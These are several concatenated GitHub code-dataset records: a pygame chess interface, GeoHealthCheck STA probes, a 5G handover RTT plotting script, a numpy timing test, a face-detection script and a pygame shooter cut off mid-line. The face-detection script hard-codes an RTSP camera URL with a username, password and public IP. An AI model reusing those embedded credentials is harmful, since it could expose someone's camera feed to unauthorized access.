casilla.fila)))\r\n\r\n screen.blit(casillaDes.pieza.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (casillaOr.columna - 1) + paso * (casillaDes.columna - casillaOr.columna),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - casillaOr.fila) + paso * (casillaOr.fila - casillaDes.fila)))\r\n\r\n pygame.display.flip()\r\n\r\n pygame.display.flip()\r\n\r\n\r\ndef dibujarSeleccion(casillaPresionada,juego,screen):\r\n\r\n CasillaPresionada = juego.tablero.casillas[casillaPresionada[0]] \\\r\n [casillaPresionada[1]]\r\n\r\n screen.blit(CasillaPresionada.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaPresionada.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaPresionada.fila)))\r\n\r\n if CasillaPresionada.pieza is not None:\r\n if CasillaPresionada.pieza.activo:\r\n screen.blit(CasillaPresionada.pieza.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaPresionada.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaPresionada.fila)))\r\n\r\n screen.blit(juego.seleccion, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaPresionada.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaPresionada.fila)))\r\n\r\n pygame.display.flip()\r\n\r\n\r\ndef dibujarJugada(movimientos, juego, screen):\r\n\r\n for movimiento in movimientos:\r\n\r\n CasillaValida = juego.tablero.casillas[movimiento[0]] \\\r\n [movimiento[1]]\r\n\r\n screen.blit(CasillaValida.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaValida.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaValida.fila)))\r\n\r\n if CasillaValida.pieza is not None:\r\n if CasillaValida.pieza.activo:\r\n screen.blit(CasillaValida.pieza.imagen, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaValida.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaValida.fila)))\r\n\r\n screen.blit(juego.jugadasValidas, (\r\n Opciones.SangriaIzq + Opciones.TamanoCuadro * (CasillaValida.columna - 1),\r\n Opciones.SangriaSup + Opciones.TamanoCuadro * (8 - CasillaValida.fila)))\r\n\r\n pygame.display.flip()\r\n\r\n\r\ndef recibirJugada(juego,screen):\r\n\r\n jugadaValida = False\r\n\r\n while not jugadaValida:\r\n\r\n piezaSeleccionada = None\r\n\r\n seleccionValida = False\r\n\r\n event = pygame.event.wait()\r\n\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n posicion = event.pos\r\n\r\n #Casillas de acuerdo al ajedrez\r\n casillaPresionada = [\r\n (8 - (posicion[1] - Opciones.SangriaSup) // Opciones.TamanoCuadro),\r\n ((posicion[0] - Opciones.SangriaIzq) // Opciones.TamanoCuadro) + 1\r\n ]\r\n\r\n if casillaPresionada[0] in range(1,9) and casillaPresionada[0] in range(1,9):\r\n\r\n if juego.tablero.casillas[casillaPresionada[0]][casillaPresionada[1]].pieza is None:\r\n continue\r\n if not juego.tablero.casillas[casillaPresionada[0]][casillaPresionada[1]].pieza.activo:\r\n continue\r\n if not juego.tablero.casillas[casillaPresionada[0]][casillaPresionada[1]].pieza.color == \\\r\n juego.jugadores[juego.turno % 2].color:\r\n continue\r\n\r\n piezaSeleccionada = juego.tablero.casillas[casillaPresionada[0]][casillaPresionada[1]].pieza\r\n\r\n dibujarSeleccion(casillaPresionada,juego,screen)\r\n\r\n else:\r\n continue\r\n\r\n #Dibujado de las opciones por jugar\r\n dibujarJugada(piezaSeleccionada.movimientosDisponibles,juego,screen)\r\n\r\n #Espera la casilla de destino\r\n anotherEvent = pygame.event.wait()\r\n\r\n if anotherEvent.type == pygame.QUIT:\r\n sys.exit()\r\n elif anotherEvent.type == pygame.MOUSEBUTTONDOWN:\r\n nuevaPosicion = anotherEvent.pos\r\n\r\n # Casillas de acuerdo al ajedrez\r\n nuevaCasillaPresionada = [\r\n (8 - (nuevaPosicion[1] - Opciones.SangriaSup) // Opciones.TamanoCuadro),\r\n ((nuevaPosicion[0] - Opciones.SangriaIzq) // Opciones.TamanoCuadro) + 1\r\n ]\r\n\r\n if nuevaCasillaPresionada in piezaSeleccionada.movimientosDisponibles:\r\n\r\n jugadaValida = True\r\n\r\n #Redibujado\r\n dibujarPantalla(juego,screen)\r\n\r\n return [casillaPresionada, nuevaCasillaPresionada]\r\n\r\n\r\ndef main():\r\n\r\n pygame.init()\r\n\r\n borrarEventos()\r\n\r\n screen = pygame.display.set_mode((Opciones.AnchoPantalla, Opciones.AltoPantalla))\r\n pygame.display.set_caption(\"Automatic Chess\")\r\n\r\n juego = Juego()\r\n\r\n dibujarPantalla(juego, screen)\r\n\r\n terminar = False\r\n\r\n while True:\r\n\r\n juego.iniciarTurno()\r\n\r\n if juego.jugadores[juego.turno % 2].movimientosDisponibles == 0:\r\n break\r\n\r\n jugada = recibirJugada(juego,screen)\r\n\r\n juego.desarrollarTurno(jugada)\r\n\r\n dibujarMovimiento(juego, screen, jugada)\r\n\r\n terminar = juego.terminarTurno()\r\n\r\n dibujarPantalla(juego, screen)\r\n\r\n\r\n if terminar:\r\n if (juego.turno % 2) == ((1 - Opciones.JugadorColor) // 2):\r\n print(\"Jugador Negro ganó\")\r\n else:\r\n print(\"Jugador Blanco ganó\")\r\n else:\r\n print(\"Empate\")\r\n \r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"vick08bv/Ajedrez","sub_path":"Ajedrez/Interfaz/InterfazJuego.py","file_name":"InterfazJuego.py","file_ext":"py","file_size_in_byte":8613,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37447018518","text":"from GeoHealthCheck.probe import Probe\n\n\nclass StaCaps(Probe):\n \"\"\"Probe for SensorThings API main endpoint url\"\"\"\n\n NAME = 'STA Capabilities'\n DESCRIPTION = 'Perform STA Capabilities Operation and check validity'\n RESOURCE_TYPE = 'OGC:STA'\n\n REQUEST_METHOD = 'GET'\n\n def __init__(self):\n Probe.__init__(self)\n\n CHECKS_AVAIL = {\n 'GeoHealthCheck.plugins.check.checks.HttpStatusNoError': {\n 'default': True\n },\n 'GeoHealthCheck.plugins.check.checks.JsonParse': {\n 'default': True\n },\n 'GeoHealthCheck.plugins.check.checks.ContainsStrings': {\n 'default': True,\n 'set_params': {\n 'strings': {\n 'name': 'Must contain STA Entity names',\n 'value': ['Things', 'Datastreams', 'Observations',\n 'FeaturesOfInterest', 'Locations']\n }\n }\n },\n }\n \"\"\"\n Checks avail for all specific Caps checks.\n Optionally override Check.PARAM_DEFS using set_params\n e.g. with specific `value` or even `name`.\n \"\"\"\n\n\nclass StaGetEntities(Probe):\n \"\"\"Fetch STA entities of type and check result\"\"\"\n\n NAME = 'STA GetEntities'\n DESCRIPTION = 'Fetch all STA Entities of given type'\n RESOURCE_TYPE = 'OGC:STA'\n\n REQUEST_METHOD = 'GET'\n\n # e.g. http://52.26.56.239:8080/OGCSensorThings/v1.0/Things\n REQUEST_TEMPLATE = '/{entities}'\n\n def __init__(self):\n Probe.__init__(self)\n\n PARAM_DEFS = {\n 'entities': {\n 'type': 'string',\n 'description': 'The STA Entity collection type',\n 'default': 'Things',\n 'required': True,\n 'range': ['Things', 'DataStreams', 'Observations',\n 'Locations', 'Sensors', 'FeaturesOfInterest',\n 'ObservedProperties', 'HistoricalLocations']\n }\n }\n \"\"\"Param defs\"\"\"\n\n CHECKS_AVAIL = {\n 'GeoHealthCheck.plugins.check.checks.HttpStatusNoError': {\n 'default': True\n },\n 'GeoHealthCheck.plugins.check.checks.JsonParse': {\n 'default': True\n }\n }\n \"\"\"Check for STA Get entity Collection\"\"\"\n","repo_name":"geopython/GeoHealthCheck","sub_path":"GeoHealthCheck/plugins/probe/sta.py","file_name":"sta.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"76"} +{"seq_id":"29675030236","text":"#!/usr/bin/env python3\nfrom os import path\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.patches import Patch\n\nfrom utils.context import data_processed_dir, plot_dir\nfrom utils.utils import plot_handler, colorlist20, remove_nan\n\n# comment out these lines if latex not installed\nplt.rc('font', family='sans-serif', serif='cm10')\nplt.rc('text', usetex=True)\n\n\ndef check_if_range_lies(col, interval_list):\n for i, interval_set in enumerate(interval_list):\n if interval_set[0] <= col <= interval_set[1]:\n return i + 1\n return np.nan\n\n\n## Config\nSHOW_PLOT_FLAG = False\nDATA_FOLDER = path.join(data_processed_dir, 'figure7-nsa_modes')\nCOMBINED_FILE = path.join(DATA_FOLDER, \"TCP-EXPERIMENTS.csv\")\nHO_INTERVAL_START = 100 # in ms\nHO_INTERVAL_END = 1000\n\n## read data\nbbr_df = pd.read_csv(COMBINED_FILE, low_memory=False)\n\nbbr_lte_df = bbr_df[bbr_df['mode'] == 'lte_mode'].copy(deep=True)\nbbr_dual_df = bbr_df[bbr_df['mode'] == 'dual_mode'].copy(deep=True)\nbbr_5gonly_df = bbr_df[bbr_df['mode'] == '5gonly_mode'].copy(deep=True)\n\n# process 5gonly mode\nbbr_5gonly_scgr_ho_time = bbr_5gonly_df[bbr_5gonly_df['nr_ho_category'] == 'nsa_scgr']['time_since_start'].to_list()\nbbr_5gonly_scgr_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_5gonly_scgr_ho_time]\nbbr_df['5gonly_scgr_row'] = bbr_df.apply(\n lambda x: check_if_range_lies(x['time_since_start'], bbr_5gonly_scgr_ho_interval),\n axis=1)\nbbr_5gonly_scgr_df = bbr_df[bbr_df['5gonly_scgr_row'].notna()].copy(deep=True)\n\nbbr_5gonly_scga_ho_time = bbr_5gonly_df[bbr_5gonly_df['nr_ho_category'] == 'nsa_scga']['time_since_start'].to_list()\nbbr_5gonly_scga_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_5gonly_scga_ho_time]\nbbr_df['5gonly_scga_row'] = bbr_df.apply(\n lambda x: check_if_range_lies(x['time_since_start'], bbr_5gonly_scga_ho_interval),\n axis=1)\nbbr_5gonly_scga_df = bbr_df[bbr_df['5gonly_scga_row'].notna()].copy(deep=True)\n\nbbr_5gonly_scgm_ho_time = bbr_5gonly_df[bbr_5gonly_df['nr_ho_category'] == 'nsa_scgm']['time_since_start'].to_list()\nbbr_5gonly_scgm_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_5gonly_scgm_ho_time]\nbbr_df['5gonly_scgm_row'] = bbr_df.apply(\n lambda x: check_if_range_lies(x['time_since_start'], bbr_5gonly_scgm_ho_interval),\n axis=1)\nbbr_5gonly_scgm_df = bbr_df[bbr_df['5gonly_scgm_row'].notna()].copy(deep=True)\n\n# process dual mode\nbbr_dual_scgr_ho_time = bbr_dual_df[bbr_dual_df['nr_ho_category'] == 'nsa_scgr']['time_since_start'].to_list()\nbbr_dual_scgr_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_dual_scgr_ho_time]\nbbr_df['dual_scgr_row'] = bbr_df.apply(lambda x: check_if_range_lies(x['time_since_start'], bbr_dual_scgr_ho_interval),\n axis=1)\nbbr_dual_scgr_df = bbr_df[bbr_df['dual_scgr_row'].notna()].copy(deep=True)\n\nbbr_dual_scga_ho_time = bbr_dual_df[bbr_dual_df['nr_ho_category'] == 'nsa_scga']['time_since_start'].to_list()\nbbr_dual_scga_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_dual_scga_ho_time]\nbbr_df['dual_scga_row'] = bbr_df.apply(lambda x: check_if_range_lies(x['time_since_start'], bbr_dual_scga_ho_interval),\n axis=1)\nbbr_dual_scga_df = bbr_df[bbr_df['dual_scga_row'].notna()].copy(deep=True)\n\nbbr_dual_scgm_ho_time = bbr_dual_df[bbr_dual_df['nr_ho_category'] == 'nsa_scgm']['time_since_start'].to_list()\nbbr_dual_scgm_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_dual_scgm_ho_time]\nbbr_df['dual_scgm_row'] = bbr_df.apply(lambda x: check_if_range_lies(x['time_since_start'], bbr_dual_scgm_ho_interval),\n axis=1)\nbbr_dual_scgm_df = bbr_df[bbr_df['dual_scgm_row'].notna()].copy(deep=True)\n\nfeature = 'SS_RTT_AVG'\nbbr_5gonly_ho_no = bbr_5gonly_df[feature].to_list()\nbbr_5gonly_scgr = bbr_5gonly_scgr_df[feature].to_list()\nbbr_5gonly_scga = bbr_5gonly_scga_df[feature].to_list()\nbbr_5gonly_scgm = bbr_5gonly_scgm_df[feature].to_list()\n\nbbr_dual_ho_no = bbr_dual_df[feature].to_list()\nbbr_dual_scgr = bbr_dual_scgr_df[feature].to_list()\nbbr_dual_scga = bbr_dual_scga_df[feature].to_list()\nbbr_dual_scgm = bbr_dual_scgm_df[feature].to_list()\n\n#### Plot graph\nif True: # use truth value to turn on and off plotting\n plot_id = 'figure7'\n plot_name = feature\n plt.close('all')\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(5, 1.75), sharey='all')\n fig.tight_layout()\n fig.subplots_adjust(wspace=0.025)\n\n pos = [0, 1, 2, 3]\n width_box = 0.3\n pad = 0.08\n no_ho_idx = 4\n scgr_idx = 6\n scga_idx = 2\n scgm_idx = 0\n\n ec_idx_list = [no_ho_idx, scgr_idx, scga_idx, scgm_idx]\n fc_list = [colorlist20[x + 1] for x in ec_idx_list]\n ec_list = [colorlist20[x] for x in ec_idx_list]\n\n bbr_dual_list = [bbr_dual_ho_no, bbr_dual_scgr, bbr_dual_scga, bbr_dual_scgm]\n bbr_dual_list = [np.array(x) for x in bbr_dual_list]\n bbr_dual_list = [remove_nan(x) for x in bbr_dual_list]\n\n for idx in range(pos.__len__()):\n box1 = ax1.boxplot([bbr_dual_list[idx]],\n positions=[pos[idx]], autorange=True, showfliers=False, zorder=4,\n widths=width_box, patch_artist=True)\n for item in ['boxes', 'fliers', 'medians', 'caps']:\n plt.setp(box1[item], color=ec_list[idx], linewidth=1.5)\n plt.setp(box1['whiskers'], color=ec_list[idx], linewidth=1.5, linestyle=':')\n plt.setp(box1[\"boxes\"], facecolor=fc_list[idx], linewidth=1.5)\n\n ax1.axhline(y=93, linewidth=2, color='darkgrey', linestyle=':', zorder=2)\n\n bbr_5gonly_list = [bbr_5gonly_ho_no, bbr_5gonly_scgr, bbr_5gonly_scga, bbr_5gonly_scgm]\n bbr_5gonly_list = [np.array(x) for x in bbr_5gonly_list]\n bbr_5gonly_list = [remove_nan(x) for x in bbr_5gonly_list]\n\n for idx in range(pos.__len__()):\n box2 = ax2.boxplot([bbr_5gonly_list[idx]],\n positions=[pos[idx]], autorange=True, showfliers=False, zorder=4,\n widths=width_box, patch_artist=True)\n for item in ['boxes', 'fliers', 'medians', 'caps']:\n plt.setp(box2[item], color=ec_list[idx], linewidth=1.5)\n plt.setp(box2['whiskers'], color=ec_list[idx], linewidth=1.5, linestyle=':')\n plt.setp(box2[\"boxes\"], facecolor=fc_list[idx], linewidth=1.5)\n\n # set y-labels and limits\n ax1.set_ylabel('RTT (ms)', fontsize=16)\n ax1.set_ylim([0, 320])\n ax1.set_yticks([0, 100, 200, 300])\n ax1.tick_params(axis='both', which='major', bottom=False, labelsize=13)\n ax2.tick_params(axis='both', which='major', bottom=False, left=False, labelsize=13)\n\n ax1.text(0.75, 260, r'\\textit{dual mode}', ha=\"center\", va=\"center\", fontsize=14,\n bbox=dict(facecolor='lightgray', edgecolor='lightgray', boxstyle='round,pad=.2'), zorder=8)\n ax2.text(2.275, 270, r'\\textit{5G-only mode}', ha=\"center\", va=\"center\", fontsize=14,\n bbox=dict(facecolor='lightgray', edgecolor='lightgray', boxstyle='round,pad=.1'), zorder=8)\n\n ax1.set_xticklabels([])\n ax2.set_xticklabels([])\n\n ax1.yaxis.grid(color='gainsboro', linestyle='dashed', zorder=1)\n ax2.yaxis.grid(color='gainsboro', linestyle='dashed', zorder=1)\n\n labels = ['w/o HO', 'SCGR', 'SCGA', 'SCGM']\n patches = [Patch(facecolor=fc_list[i], edgecolor=ec_list[i], label=labels[i]) for i in range(pos.__len__())]\n\n ax1.legend(handles=patches, loc='upper right',\n ncol=4, bbox_to_anchor=(2.0, 1.3), facecolor='#dddddd', columnspacing=0.4,\n handlelength=2, framealpha=.8, fontsize=13, borderpad=0.1, labelspacing=.2, handletextpad=0.5)\n\n plot_handler(plt, plot_id, plot_name, plot_dir, show_flag=SHOW_PLOT_FLAG, ignore_eps=True, pad_inches=0.07)\n\nprint('Complete./')\n","repo_name":"SIGCOMM22-5GMobility/artifact","sub_path":"scripts/plot-section4-figure7.py","file_name":"plot-section4-figure7.py","file_ext":"py","file_size_in_byte":7863,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"39933194598","text":"import timeit\n\n# >>>>>> Package Imports <<<<<<<\nimport numpy as np\n\n# >>>>>> Local Imports <<<<<<<\n\n\n####################################################\n# CODE\n####################################################\n\ndef generate_random_non_zero_matrix(size = [10,10]):\n \"\"\"\n \"\"\"\n return np.random.choice( 100 , size) + 1\n\n\n\ndef divide_matrices_vector_form(matrix1, matrix2):\n \"\"\"\n generates random matrices and then div\n \"\"\"\n matrix1 = matrix1/matrix2\n\n return matrix1\n\n\ndef divide_matrices_loop(matrix1, matrix2):\n \"\"\"\n generates random matrices and then div\n \"\"\"\n for idx in range(matrix1.shape[0]):\n for jdx in range(matrix1.shape[1]):\n matrix1[idx,jdx] /= matrix2[idx,jdx]\n\n return matrix1\n\n\n####################################################\n# MAIN\n####################################################\n\nif __name__ == \"__main__\":\n mat1 = generate_random_non_zero_matrix()\n mat2 = generate_random_non_zero_matrix()\n\n print( timeit.timeit('divide_matrices_vector_form(mat1,mat2)', globals=globals(), number=10000) )\n print( timeit.timeit('divide_matrices_loop(mat1,mat2)', globals=globals(), number=10000) )\n\n# EOF\n","repo_name":"ai-nikolai/barl","sub_path":"experiments/experiments_profiling_numpy.py","file_name":"experiments_profiling_numpy.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"18988835702","text":"# USAGE\r\n# python recognize_faces_image.py --encodings encodings.pickle\r\n\r\n# import the necessary packages\r\nimport face_recognition\r\nimport argparse\r\nimport pickle\r\nimport cv2\r\nimport os\r\nimport time\r\n# construct the argument parser and parse the arguments\r\nap = argparse.ArgumentParser()\r\n#ap.add_argument(\"-e\", \"--encodings\", required=True,\r\n#\thelp=\"path to serialized db of facial encodings\")\r\n#ap.add_argument(\"-i\", \"--image\", required=False,\r\n# \thelp=\"path to input image\")\r\nap.add_argument(\"-d\", \"--detection-method\", type=str, default=\"cnn\",\r\n\thelp=\"face detection model to use: either `hog` or `cnn`\")\r\nargs = vars(ap.parse_args())\r\n\r\ncap2 = cv2.VideoCapture('rtsp://admin:Lock@1234@202.134.159.185:10554/streaming/Channels/401')\r\nret2, frame2 = cap2.read()\r\n\r\n# load the known faces and embeddings\r\n#print(\"[INFO] loading encodings...\")\r\n#data = pickle.loads(open(args[\"encodings\"], \"rb\").read())\r\n\r\n# load the input image and convert it from BGR to RGB\r\n# pathImg = r'C:\\Users\\laptopno202\\Desktop\\facebb\\images'\r\n\r\n# def get_latest_image(dirpath, valid_extensions=('jpg','jpeg','png')):\r\n# \"\"\"\r\n# Get the latest image file in the given directory\r\n# \"\"\"\r\n\r\n# # get filepaths of all files and dirs in the given dir\r\n# image_files = [os.path.join(dirpath, filename) for filename in os.listdir(dirpath)]\r\n# # filter out directories, no-extension, and wrong extension files\r\n# image_files = [f for f in image_files if '.' in f and \\\r\n# f.rsplit('.',1)[-1] in valid_extensions and os.path.isfile(f)]\r\n\r\n# if not image_files:\r\n# raise ValueError(\"No valid images in %s\" % dirpath)\r\n\r\n# return max(image_files, key=os.path.getmtime)\r\n\r\n# folder_last_modified_time = os.path.getmtime(pathImg)\r\n# print(\"Last modification time \", folder_last_modified_time)\r\n\r\n# local_time = time.ctime(folder_last_modified_time)\r\n# print(\"Last modification time(Local time):\", local_time)\r\n\r\n# image=get_latest_image(pathImg)\r\n# print(type(image))\r\n# print(os.path.basename(image))\r\n\r\n\r\n# image = cv2.imread(image)\r\n# rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n# print(rgb.shape)\r\n\r\n\r\n\r\n\r\n# image = cv2.imread(image)\r\n# rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n\r\n# detect the (x, y)-coordinates of the bounding boxes corresponding\r\n# to each face in the input image, then compute the facial embeddings\r\n# for each face\r\n#print(\"[INFO] recognizing faces...\")\r\n# from camerasync import *\r\n# try:\r\n# \tcap2 = VideoCaptureAsync('rtsp://admin:Lock@1234@202.134.159.185:10554/streaming/Channels/401')\r\n# \tcap2.start()\r\n# \tprint('Async')\r\n# except:\r\n# \tcap2 = cv2.VideoCapture('rtsp://admin:Lock@1234@202.134.159.185:10554/streaming/Channels/401')\r\n# \tprint('continuous')\r\ndef feed(cap,feedname):\r\n\tret, frame = cap.read()\r\n\tprint(ret)\r\n\r\n\tboxes = face_recognition.face_locations(frame,\r\n\t\tmodel=args[\"detection_method\"])\r\n#encodings = face_recognition.face_encodings(rgb, boxes)\r\n\r\n# initialize the list of names for each face detected\r\n#names = []\r\n\r\n# loop over the facial embeddings\r\n#for encoding in encodings:\r\n\t# attempt to match each face in the input image to our known\r\n\t# encodings\r\n\t# matches = face_recognition.compare_faces(data[\"encodings\"],\r\n\t# \tencoding)\r\n\t# name = \"Unknown\"\r\n\t#\r\n\t# # check to see if we have found a match\r\n\t# if True in matches:\r\n\t# \t# find the indexes of all matched faces then initialize a\r\n\t# \t# dictionary to count the total number of times each face\r\n\t# \t# was matched\r\n\t# \tmatchedIdxs = [i for (i, b) in enumerate(matches) if b]\r\n\t# \tcounts = {}\r\n\t#\r\n\t# \t# loop over the matched indexes and maintain a count for\r\n\t# \t# each recognized face face\r\n\t# \tfor i in matchedIdxs:\r\n\t# \t\tname = data[\"names\"][i]\r\n\t# \t\tcounts[name] = counts.get(name, 0) + 1\r\n\t#\r\n\t# \t# determine the recognized face with the largest number of\r\n\t# \t# votes (note: in the event of an unlikely tie Python will\r\n\t# \t# select first entry in the dictionary)\r\n\t# \tname = max(counts, key=counts.get)\r\n\t#\r\n\t# # update the list of names\r\n\t# names.append(name)\r\n\r\n# loop over the recognized faces\r\n\tfor (top, right, bottom, left) in boxes:\r\n\t\t# draw the predicted face name on the image\r\n\t\tcv2.rectangle(frame, (left, top), (right, bottom), (0, 255, 0), 2)\r\n\t\ty = top - 15 if top - 15 > 15 else top + 15\r\n\t\t#cv2.putText(image,{top,bottom},(left, y), cv2.FONT_HERSHEY_SIMPLEX,\r\n\t\t#\t0.75, (0, 255, 0), 2)\r\n\r\n# show the output image\r\n#print(\"The persion identified in the pic\" ,name)\r\n\tcv2.imshow(\"Image\", frame)\r\n\t#print(\" The BB cordinates are \", top,right,bottom,left)\r\n\tcv2.waitKey(0)\r\n\tcap.release()\r\n\r\n\tcv2.destroyAllWindows()\r\nfeed(cap2,'ch-8')\r\n#print(\"The persion identified in the pic\" ,{names})\r\n","repo_name":"prashuu13/server2_camera","sub_path":"faces_detect.py","file_name":"faces_detect.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70705966327","text":"import pygame\nimport random\n\n#TODO: hacer que lso enemigos disparen :)\n#TODO: hacer que las bombas funcionen\n#TODO: colision de las balas enemigas con el jugador\n#TODO: qué pasa con el jugador? muere? recupera la salud?Agregar entonces modficadorpara la salud\n#TODO: juego para dos jugadores :)\n\nANCHO=640\nALTO=480\nROJO=[255,0,0]\nNEGRO=[0,0,0]\nBLANCO=[255,255,255]\nVERDE=[0,255,0]\nSALMON = (240, 30, 100)\nAZUL = (0,0, 200)\nclass Cuadro(pygame.sprite.Sprite):\n '''\n Clase cuadro\n '''\n def __init__(self, p , cl=VERDE):\n pygame.sprite.Sprite.__init__(self)\n\n #self.id = =id\n self.image = pygame.Surface([40,50])\n self.image.fill(cl)\n self.rect = self.image.get_rect()\n self.rect.x=p[0]\n self.rect.y=p[1]\n self.velx=0\n self.vely=0\n\n self.bombas = 0 \n self.vidas = 3\n self.salud = 3 # con cada bala la salud se decrementa, al final, cuando es cero, se resta 1 a la vida\n\n def update(self):\n self.rect.x += self.velx\n self.rect.y += self.vely\n\n\n\nclass Rival(pygame.sprite.Sprite):\n '''\n Clase rival\n '''\n def __init__(self, p , cl=BLANCO):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([30,40])\n self.image.fill(cl)\n self.rect = self.image.get_rect()\n self.rect.x=p[0]\n self.rect.y=p[1]\n self.velx=5\n #self.vely=3\n self.temp = 100 #temporizador\n\n def update(self):\n self.rect.x += self.velx\n #self.rect.y += self.vely\n if self.temp >0 :\n self.temp -= 1 #Inicializr de nuevo el temp y disparar no s algo que se hará dentro de la clase, si no por fuera\n\nclass Bala(pygame.sprite.Sprite):\n '''\n Clase Bala\n '''\n def __init__(self, p , cl=ROJO):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([10,20])\n self.image.fill(cl)\n self.rect = self.image.get_rect()\n self.rect.x=p[0]\n self.rect.y=p[1]\n self.vely=-7\n #self.vely=3\n\n def update(self):\n self.rect.y += self.vely\n\nclass Bomba(pygame.sprite.Sprite):\n '''\n Clase Bomba\n '''\n def __init__(self, p , cl=ROJO):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([30,30])\n self.image.fill(cl)\n self.rect = self.image.get_rect()\n self.rect.x=p[0]\n self.rect.y=p[1]\n self.vely=-5\n #self.vely=3\n\n def update(self):\n self.rect.y += self.vely\n\n\n\n\n#-------------------------------------------------------------------------------------------------\n\nclass Ventaja(pygame.sprite.Sprite):\n '''\n Clase ventaja - modificadores \n '''\n def __init__(self, p , cl=AZUL):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([8,8])\n self.image.fill(cl)\n self.rect = self.image.get_rect()\n self.rect.x=p[0]\n self.rect.y=p[1]\n self.vely=-5\n #self.vely=3\n\n def update(self):\n self.rect.y += self.vely\n\n if self.rect.y >= (ANCHO - self.rect.height):\n self.rect.y = ANCHO - self.rect.height\n self.vely = 0\n\n\n\nif __name__ == '__main__':\n pygame.init()\n ptos=0\n pantalla=pygame.display.set_mode([ANCHO,ALTO])\n\n jugadores= pygame.sprite.Group()\n rivales = pygame.sprite.Group()\n balas = pygame.sprite.Group()\n balasR = pygame.sprite.Group() #balas de los rivales\n bomba = pygame.sprite.Group()\n ventajas = pygame.sprite.Group()\n\n j1=Cuadro([100,100],VERDE)\n j2=Cuadro([250,100],ROJO)\n\n jugadores.add(j1)\n jugadores.add(j2)\n\n #creacion de rivales\n n=10\n for i in range(n):\n r=Rival([20,20])\n r.rect.x = random.randrange(1,150)\n r.rect.y = random.randrange(ALTO- (r.rect.height+100))\n r.velx = random.randrange(10)\n rivales.add(r)\n\n\n\n reloj=pygame.time.Clock()\n fin=False\n endGame = False\n while not (fin or endGame):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n fin=True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT:\n j1.velx = 5\n j1.vely = 0\n if event.key == pygame.K_LEFT:\n j1.velx = -5\n j1.vely = 0\n if event.key == pygame.K_UP:\n j1.vely = -5\n j1.velx = 0\n if event.key == pygame.K_DOWN:\n j1.vely = 5\n j1.velx = 0\n if event.key == pygame.K_t:\n #crear balas\n b=Bala([j2.rect.x , j2.rect.y])\n balas.add(b)\n if event.key == pygame.K_p:\n #crear balas\n b=Bala([j1.rect.x , j1.rect.y])\n balas.add(b)\n if event.key == pygame.K_i:\n #crear bomba\n u=Bomba([j1.rect.x , j1.rect.y])\n bomba.add(u)\n if event.key == pygame.K_d:\n j2.vely = 0\n j2.velx = 5\n if event.key == pygame.K_a:\n j2.vely = 0\n j2.velx = -5\n if event.key == pygame.K_w:\n j2.velx = 0\n j2.vely = -5\n if event.key == pygame.K_s:\n j2.velx = 0\n j2.vely = 5\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_RIGHT:\n j1.velx=0\n j1.vely=0\n if event.key == pygame.K_LEFT:\n j1.velx=0\n j1.vely=0\n if event.key == pygame.K_UP:\n j1.velx=0\n j1.vely=0\n if event.key == pygame.K_DOWN:\n j1.velx=0\n j1.vely=0\n if event.key == pygame.K_d:\n j2.velx=0\n j2.vely=0\n if event.key == pygame.K_a:\n j2.velx=0\n j2.vely=0\n if event.key == pygame.K_w:\n j2.velx=0\n j2.vely=0\n if event.key == pygame.K_s:\n j2.velx=0\n j2.vely=0\n\n\n\n #control\n jugadores.update()\n\n #Agrega las condiciones de parada\n if j1.rect.x > (ANCHO - j1.rect.width):\n j1.rect.x = ANCHO - j1.rect.width\n j1.velx=0\n if j2.rect.x > (ANCHO - j2.rect.width):\n j2.rect.x = ANCHO - j2.rect.width\n j2.velx=0\n if j1.rect.x < (0):\n j1.rect.x = 0\n j1.velx=0\n if j2.rect.x < (0):\n j2.rect.x = 0\n j2.velx=0\n if j1.rect.y > (ALTO - j1.rect.height):\n j1.rect.y = ALTO - j1.rect.height\n 